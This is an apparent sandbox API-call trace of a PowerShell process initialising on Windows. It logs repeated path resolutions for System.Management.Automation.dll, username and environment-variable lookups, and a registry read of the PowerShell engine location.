	[0223.278] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x1bd070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0223.279] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1bd170, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.279] SetErrorMode (uMode=0x1) returned 0x1
	[0223.279] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1bd380 | out: lpFileInformation=0x1bd380*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.279] SetErrorMode (uMode=0x1) returned 0x1
	[0223.279] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1bd170, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.279] SetErrorMode (uMode=0x1) returned 0x1
	[0223.279] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1bd380 | out: lpFileInformation=0x1bd380*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.279] SetErrorMode (uMode=0x1) returned 0x1
	[0223.279] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1bd180, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.279] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x1bd070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.288] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1bd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.289] SetErrorMode (uMode=0x1) returned 0x1
	[0223.289] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1bd640 | out: lpFileInformation=0x1bd640*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.289] SetErrorMode (uMode=0x1) returned 0x1
	[0223.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0223.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0223.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0223.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.387] CoTaskMemAlloc (cb=0x804) returned 0x1b7c6ed0
	[0229.387] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7c6ed0, nSize=0x1bd9a8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1bd9a8) returned 0x1
	[0230.060] CoTaskMemFree (pv=0x1b7c6ed0) 
	[0230.060] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0230.060] GetUserNameW (in: lpBuffer=0x2989c0, pcbBuffer=0x1bd9e8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1bd9e8) returned 1
	[0230.060] CoTaskMemFree (pv=0x2989c0) 
	[0230.062] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f11b98*="Available", lpRawData=0x2f11928) returned 1
	[0230.555] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0230.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.555] CoTaskMemFree (pv=0x2b5590) 
	[0230.556] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0230.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.556] CoTaskMemFree (pv=0x2b5590) 
	[0230.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.563] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0230.563] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0230.563] CoTaskMemFree (pv=0x2b5590) 
	[0230.563] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0230.563] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0230.563] CoTaskMemFree (pv=0x2b5590) 
	[0230.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.565] GetCurrentProcessId () returned 0xc54
	[0230.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.569] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd9c8 | out: phkResult=0x1bd9c8*=0x15c) returned 0x0
	[0230.569] RegQueryValueExW (in: hKey=0x15c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1bd94c, lpData=0x0, lpcbData=0x1bd948*=0x0 | out: lpType=0x1bd94c*=0x1, lpData=0x0, lpcbData=0x1bd948*=0x56) returned 0x0
	[0230.569] CoTaskMemAlloc (cb=0x5a) returned 0x1b7a3c80
	[0230.569] RegQueryValueExW (in: hKey=0x15c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1bd91c, lpData=0x1b7a3c80, lpcbData=0x1bd918*=0x56 | out: lpType=0x1bd91c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1bd918*=0x56) returned 0x0
	[0230.569] CoTaskMemFree (pv=0x1b7a3c80) 
	[0230.569] RegCloseKey (hKey=0x15c) returned 0x0
	[0230.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.578] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0230.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.578] CoTaskMemFree (pv=0x2b5590) 
	[0230.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
